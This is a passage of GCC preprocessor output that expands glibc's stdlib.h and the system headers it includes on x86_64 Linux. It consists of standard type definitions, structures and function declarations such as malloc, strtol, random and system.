# 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
typedef long unsigned int size_t;
# 321 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
typedef int wchar_t;
# 32 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 1 3 4
# 52 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 3 4
typedef enum
{
P_ALL,
P_PID,
P_PGID
} idtype_t;
# 40 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitstatus.h" 1 3 4
# 41 "/usr/include/stdlib.h" 2 3 4
# 55 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 1 3 4
# 120 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 25 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 2 3 4
# 121 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 2 3 4
# 56 "/usr/include/stdlib.h" 2 3 4
typedef struct
{
int quot;
int rem;
} div_t;
typedef struct
{
long int quot;
long int rem;
} ldiv_t;
__extension__ typedef struct
{
long long int quot;
long long int rem;
} lldiv_t;
# 97 "/usr/include/stdlib.h" 3 4
extern size_t __ctype_get_mb_cur_max (void) __attribute__ ((__nothrow__ , __leaf__)) ;
extern double atof (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern int atoi (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern long int atol (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
__extension__ extern long long int atoll (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern double strtod (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern float strtof (const char *__restrict __nptr,
char **__restrict __endptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long double strtold (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 176 "/usr/include/stdlib.h" 3 4
extern long int strtol (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern unsigned long int strtoul (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtouq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoll (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtoull (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 385 "/usr/include/stdlib.h" 3 4
extern char *l64a (long int __n) __attribute__ ((__nothrow__ , __leaf__)) ;
extern long int a64l (const char *__s)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
# 1 "/usr/include/x86_64-linux-gnu/sys/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 28 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/timesize.h" 1 3 4
# 29 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned char __u_char;
typedef unsigned short int __u_short;
typedef unsigned int __u_int;
typedef unsigned long int __u_long;
typedef signed char __int8_t;
typedef unsigned char __uint8_t;
typedef signed short int __int16_t;
typedef unsigned short int __uint16_t;
typedef signed int __int32_t;
typedef unsigned int __uint32_t;
typedef signed long int __int64_t;
typedef unsigned long int __uint64_t;
typedef __int8_t __int_least8_t;
typedef __uint8_t __uint_least8_t;
typedef __int16_t __int_least16_t;
typedef __uint16_t __uint_least16_t;
typedef __int32_t __int_least32_t;
typedef __uint32_t __uint_least32_t;
typedef __int64_t __int_least64_t;
typedef __uint64_t __uint_least64_t;
typedef long int __quad_t;
typedef unsigned long int __u_quad_t;
typedef long int __intmax_t;
typedef unsigned long int __uintmax_t;
# 141 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/typesizes.h" 1 3 4
# 142 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/time64.h" 1 3 4
# 143 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned long int __dev_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef unsigned long int __ino_t;
typedef unsigned long int __ino64_t;
typedef unsigned int __mode_t;
typedef unsigned long int __nlink_t;
typedef long int __off_t;
typedef long int __off64_t;
typedef int __pid_t;
typedef struct { int __val[2]; } __fsid_t;
typedef long int __clock_t;
typedef unsigned long int __rlim_t;
typedef unsigned long int __rlim64_t;
typedef unsigned int __id_t;
typedef long int __time_t;
typedef unsigned int __useconds_t;
typedef long int __suseconds_t;
typedef int __daddr_t;
typedef int __key_t;
typedef int __clockid_t;
typedef void * __timer_t;
typedef long int __blksize_t;
typedef long int __blkcnt_t;
typedef long int __blkcnt64_t;
typedef unsigned long int __fsblkcnt_t;
typedef unsigned long int __fsblkcnt64_t;
typedef unsigned long int __fsfilcnt_t;
typedef unsigned long int __fsfilcnt64_t;
typedef long int __fsword_t;
typedef long int __ssize_t;
typedef long int __syscall_slong_t;
typedef unsigned long int __syscall_ulong_t;
typedef __off64_t __loff_t;
typedef char *__caddr_t;
typedef long int __intptr_t;
typedef unsigned int __socklen_t;
typedef int __sig_atomic_t;
# 30 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __u_char u_char;
typedef __u_short u_short;
typedef __u_int u_int;
typedef __u_long u_long;
typedef __quad_t quad_t;
typedef __u_quad_t u_quad_t;
typedef __fsid_t fsid_t;
typedef __loff_t loff_t;
typedef __ino_t ino_t;
# 59 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
typedef __dev_t dev_t;
typedef __gid_t gid_t;
typedef __mode_t mode_t;
typedef __nlink_t nlink_t;
typedef __uid_t uid_t;
typedef __off_t off_t;
# 97 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
typedef __pid_t pid_t;
typedef __id_t id_t;
typedef __ssize_t ssize_t;
typedef __daddr_t daddr_t;
typedef __caddr_t caddr_t;
typedef __key_t key_t;
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clock_t.h" 1 3 4
typedef __clock_t clock_t;
# 127 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clockid_t.h" 1 3 4
typedef __clockid_t clockid_t;
# 129 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/time_t.h" 1 3 4
typedef __time_t time_t;
# 130 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/timer_t.h" 1 3 4
typedef __timer_t timer_t;
# 131 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 144 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 145 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef unsigned long int ulong;
typedef unsigned short int ushort;
typedef unsigned int uint;
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 3 4
typedef __int8_t int8_t;
typedef __int16_t int16_t;
typedef __int32_t int32_t;
typedef __int64_t int64_t;
# 156 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __uint8_t u_int8_t;
typedef __uint16_t u_int16_t;
typedef __uint32_t u_int32_t;
typedef __uint64_t u_int64_t;
typedef int register_t __attribute__ ((__mode__ (__word__)));
# 176 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/endian.h" 1 3 4
# 24 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endian.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endianness.h" 1 3 4
# 36 "/usr/include/x86_64-linux-gnu/bits/endian.h" 2 3 4
# 25 "/usr/include/endian.h" 2 3 4
# 35 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
static __inline __uint16_t
__bswap_16 (__uint16_t __bsx)
{
return __builtin_bswap16 (__bsx);
}
static __inline __uint32_t
__bswap_32 (__uint32_t __bsx)
{
return __builtin_bswap32 (__bsx);
}
# 69 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
__extension__ static __inline __uint64_t
__bswap_64 (__uint64_t __bsx)
{
return __builtin_bswap64 (__bsx);
}
# 36 "/usr/include/endian.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 1 3 4
# 32 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 3 4
static __inline __uint16_t
__uint16_identity (__uint16_t __x)
{
return __x;
}
static __inline __uint32_t
__uint32_identity (__uint32_t __x)
{
return __x;
}
static __inline __uint64_t
__uint64_identity (__uint64_t __x)
{
return __x;
}
# 37 "/usr/include/endian.h" 2 3 4
# 177 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/select.h" 1 3 4
# 30 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/select.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/select.h" 2 3 4
# 31 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h" 1 3 4
typedef struct
{
unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))];
} __sigset_t;
# 5 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 2 3 4
typedef __sigset_t sigset_t;
# 34 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timeval.h" 1 3 4
struct timeval
{
__time_t tv_sec;
__suseconds_t tv_usec;
};
# 38 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
struct timespec
{
__time_t tv_sec;
__syscall_slong_t tv_nsec;
# 26 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
};
# 40 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
typedef __suseconds_t suseconds_t;
typedef long int __fd_mask;
# 59 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
typedef struct
{
__fd_mask __fds_bits[1024 / (8 * (int) sizeof (__fd_mask))];
} fd_set;
typedef __fd_mask fd_mask;
# 91 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 101 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int select (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
struct timeval *__restrict __timeout);
# 113 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int pselect (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
const struct timespec *__restrict __timeout,
const __sigset_t *__restrict __sigmask);
# 126 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 180 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __blksize_t blksize_t;
typedef __blkcnt_t blkcnt_t;
typedef __fsblkcnt_t fsblkcnt_t;
typedef __fsfilcnt_t fsfilcnt_t;
# 227 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 1 3 4
# 44 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 1 3 4
# 21 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 2 3 4
# 45 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
typedef struct __pthread_internal_list
{
struct __pthread_internal_list *__prev;
struct __pthread_internal_list *__next;
} __pthread_list_t;
typedef struct __pthread_internal_slist
{
struct __pthread_internal_slist *__next;
} __pthread_slist_t;
# 74 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
struct __pthread_mutex_s
{
int __lock;
unsigned int __count;
int __owner;
unsigned int __nusers;
int __kind;
short __spins;
short __elision;
__pthread_list_t __list;
# 53 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
};
# 75 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
# 87 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
struct __pthread_rwlock_arch_t
{
unsigned int __readers;
unsigned int __writers;
unsigned int __wrphase_futex;
unsigned int __writers_futex;
unsigned int __pad3;
unsigned int __pad4;
int __cur_writer;
int __shared;
signed char __rwelision;
unsigned char __pad1[7];
unsigned long int __pad2;
unsigned int __flags;
# 55 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
};
# 88 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
struct __pthread_cond_s
{
__extension__ union
{
__extension__ unsigned long long int __wseq;
struct
{
unsigned int __low;
unsigned int __high;
} __wseq32;
};
__extension__ union
{
__extension__ unsigned long long int __g1_start;
struct
{
unsigned int __low;
unsigned int __high;
} __g1_start32;
};
unsigned int __g_refs[2] ;
unsigned int __g_size[2];
unsigned int __g1_orig_size;
unsigned int __wrefs;
unsigned int __g_signals[2];
};
# 24 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 2 3 4
typedef unsigned long int pthread_t;
typedef union
{
char __size[4];
int __align;
} pthread_mutexattr_t;
typedef union
{
char __size[4];
int __align;
} pthread_condattr_t;
typedef unsigned int pthread_key_t;
typedef int pthread_once_t;
union pthread_attr_t
{
char __size[56];
long int __align;
};
typedef union pthread_attr_t pthread_attr_t;
typedef union
{
struct __pthread_mutex_s __data;
char __size[40];
long int __align;
} pthread_mutex_t;
typedef union
{
struct __pthread_cond_s __data;
char __size[48];
__extension__ long long int __align;
} pthread_cond_t;
typedef union
{
struct __pthread_rwlock_arch_t __data;
char __size[56];
long int __align;
} pthread_rwlock_t;
typedef union
{
char __size[8];
long int __align;
} pthread_rwlockattr_t;
typedef volatile int pthread_spinlock_t;
typedef union
{
char __size[32];
long int __align;
} pthread_barrier_t;
typedef union
{
char __size[4];
int __align;
} pthread_barrierattr_t;
# 228 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 395 "/usr/include/stdlib.h" 2 3 4
extern long int random (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srandom (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern char *initstate (unsigned int __seed, char *__statebuf,
size_t __statelen) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern char *setstate (char *__statebuf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct random_data
{
int32_t *fptr;
int32_t *rptr;
int32_t *state;
int rand_type;
int rand_deg;
int rand_sep;
int32_t *end_ptr;
};
extern int random_r (struct random_data *__restrict __buf,
int32_t *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srandom_r (unsigned int __seed, struct random_data *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int initstate_r (unsigned int __seed, char *__restrict __statebuf,
size_t __statelen,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 4)));
extern int setstate_r (char *__restrict __statebuf,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int rand (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srand (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern int rand_r (unsigned int *__seed) __attribute__ ((__nothrow__ , __leaf__));
extern double drand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern double erand48 (unsigned short int __xsubi[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int lrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int nrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int mrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int jrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void srand48 (long int __seedval) __attribute__ ((__nothrow__ , __leaf__));
extern unsigned short int *seed48 (unsigned short int __seed16v[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void lcong48 (unsigned short int __param[7]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct drand48_data
{
unsigned short int __x[3];
unsigned short int __old_x[3];
unsigned short int __c;
unsigned short int __init;
__extension__ unsigned long long int __a;
};
extern int drand48_r (struct drand48_data *__restrict __buffer,
double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int erand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int nrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int mrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int jrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srand48_r (long int __seedval, struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int seed48_r (unsigned short int __seed16v[3],
struct drand48_data *__buffer) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lcong48_r (unsigned short int __param[7],
struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *malloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern void *calloc (size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (1, 2))) ;
extern void *realloc (void *__ptr, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__)) __attribute__ ((__alloc_size__ (2)));
extern void *reallocarray (void *__ptr, size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__))
__attribute__ ((__alloc_size__ (2, 3)));
extern void free (void *__ptr) __attribute__ ((__nothrow__ , __leaf__));
# 1 "/usr/include/alloca.h" 1 3 4
# 24 "/usr/include/alloca.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 25 "/usr/include/alloca.h" 2 3 4
extern void *alloca (size_t __size) __attribute__ ((__nothrow__ , __leaf__));
# 569 "/usr/include/stdlib.h" 2 3 4
extern void *valloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern int posix_memalign (void **__memptr, size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern void *aligned_alloc (size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (2))) ;
extern void abort (void) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern int atexit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int at_quick_exit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int on_exit (void (*__func) (int __status, void *__arg), void *__arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void quick_exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void _Exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern char *getenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 647 "/usr/include/stdlib.h" 3 4
extern int putenv (char *__string) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int setenv (const char *__name, const char *__value, int __replace)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int unsetenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int clearenv (void) __attribute__ ((__nothrow__ , __leaf__));
# 675 "/usr/include/stdlib.h" 3 4
extern char *mktemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 688 "/usr/include/stdlib.h" 3 4
extern int mkstemp (char *__template) __attribute__ ((__nonnull__ (1))) ;
# 710 "/usr/include/stdlib.h" 3 4
extern int mkstemps (char *__template, int __suffixlen) __attribute__ ((__nonnull__ (1))) ;
# 731 "/usr/include/stdlib.h" 3 4
extern char *mkdtemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 784 "/usr/include/stdlib.h" 3 4
extern int system (const char *__command) ;
# 800 "/usr/include/stdlib.h" 3 4
extern char *realpath (const char *__restrict __name,
char *__restrict __resolved) __attribute__ ((__nothrow__ , __leaf__)) ;
typedef int (*__compar_fn_t) (const void *, const void *);
# 820 "/usr/include/stdlib.h" 3 4
extern void *bsearch (const void *__key, const void *__base,
size_t __nmemb, size_t __size, __compar_fn_t __compar)
__attribute__ ((__nonnull__ (1, 2, 5))) ;
extern void qsort (void *__base, size_t __nmemb, size_t __size,
__compar_fn_t __compar) __attribute__ ((__nonnull__ (1, 4)));
# 840 "/usr/include/stdlib.h" 3 4
extern int abs (int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern long int labs (long int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern long long int llabs (long long int __x)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern div_t div (int __numer, int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern ldiv_t ldiv (long int __numer, long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern lldiv_t lldiv (long long int __numer,
long long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
# 872 "/usr/include/stdlib.h" 3 4
extern char *ecvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *fcvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *gcvt (double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern char *qecvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qfcvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qgcvt (long double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern int ecvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int fcvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qecvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qfcvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int mblen (const char *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int mbtowc (wchar_t *__restrict __pwc,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int wctomb (char *__s, wchar_t __wchar) __attribute__ ((__nothrow__ , __leaf__));
extern size_t mbstowcs (wchar_t *__restrict __pwcs,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern size_t wcstombs (char *__restrict __s,
const wchar_t *__restrict __pwcs, size_t __n)
__attribute__ ((__nothrow__ , __leaf__));
extern int rpmatch (const char *__response) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 957 "/usr/include/stdlib.h" 3 4
extern int getsubopt (char **__restrict __optionp,
char *const *__restrict __tokens,
char **__restrict __valuep)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2, 3))) ;
# 1003 "/usr/include/stdlib.h" 3 4
extern int getloadavg (double __loadavg[], int __nelem)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 1013 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdlib-float.h" 1 3 4
# 1014 "/usr/include/stdlib.h" 2 3 4
# 1023 "/usr/include/stdlib.h" 3 4
